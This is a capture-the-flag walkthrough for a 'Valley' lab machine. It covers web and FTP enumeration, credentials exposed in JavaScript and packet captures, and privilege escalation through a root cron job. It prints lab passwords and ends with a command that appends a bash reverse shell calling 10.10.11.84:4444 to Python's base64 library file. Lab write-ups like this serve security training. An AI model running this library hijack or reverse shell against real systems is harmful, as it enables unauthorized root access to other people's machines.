Valley CTF

HTTP and FTP Enumeration - Wireshark Analysis - Lateral Move - CronJob PrivEsc

PreviousMarket Place NextWeasel

Last updated 1 year ago

Valley CTF

HTTP and FTP Enumeration - Wireshark Analysis - Lateral Move - CronJob PrivEsc

Scanning

Starting off with the nmap scan

The SSH doesn't seems to be vulnerable - Need potential credentials to login
Need to enumerate the HTTP port - by finding some hidden directories
If we find some valid credentials, we can logon to FTP for further enumeration

Enumeration and Foothold

On checking the website hosted on the IP, we get two endpoints gallery and pricing

Visiting the gallery endpoint and clicking on an image - redirects to /static endpoint with the index of the image followed by it !

Let's find some hidden files on the website for the /static endpoint

/00 looks interesting - On visiting it !

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

We found another directory /dev1243224123123 - Let's visit that

Tried all default credentials and bruteforcing for some potential credentials but it's of no use
Viewed the source page and found an interesting .js file - dev.js

if (username === "siemDev" && password === "california") {
        window.location.href = "/dev1243224123123/devNotes37370.txt";
    } else {
        loginErrorMsg.style.opacity = 1;
    }

Found valid credentials embedded inside the js file in plain text - Loggin in gives us another note

dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port

Let's reuse the credentials to connect with the FTP server and continue our enumeration

Cool, we have some .pcapng files - Let's examine that with Wireshark and see how the data travels

siemFTP and siemHTTP1 din't have anything useful but siemHTTP2 had a POST request on the index.html endpoint - which means there are chances of passing the credentials in plain text

Let's SSH into the machine and get a shell and grab the user.txt

Lateral Movement

We find another executable file called valleyAuthenticator, let's tranfer the file and examine it using strings

valley:liberty123

Let's SSH again with the above creds as the valley user !

Privilege Escalation

If we examine the /etc/crontab file, we see there is python file photosEncrypt.py which uses file base64 python module

The python file basically just encrypts the photos using the Base64 module and outputs it - It's run as root

So it imports the base64 module file, what if we can append our reverse shell ? Do we have write permissions?

I checked the permissions on the file /usr/lib/python3.8/base64.py and it was owned by root and ValleyAdmin group - and the user valley is a part of the ValleyAdmin group !

Another way would be !

find / -writable 2>/dev/null | grep "python"
/usr/lib/python3.8
/usr/lib/python3.8/base64.py

Let's add our reverse shell into this file and meanwhile start a listener !

$ cat >> /usr/lib/python3.8/base64.py
import re
import struct
import binascii
import os

os.system('/bin/bash -c \'bash -i >& /dev/tcp/10.10.11.84/4444 0>&1\'')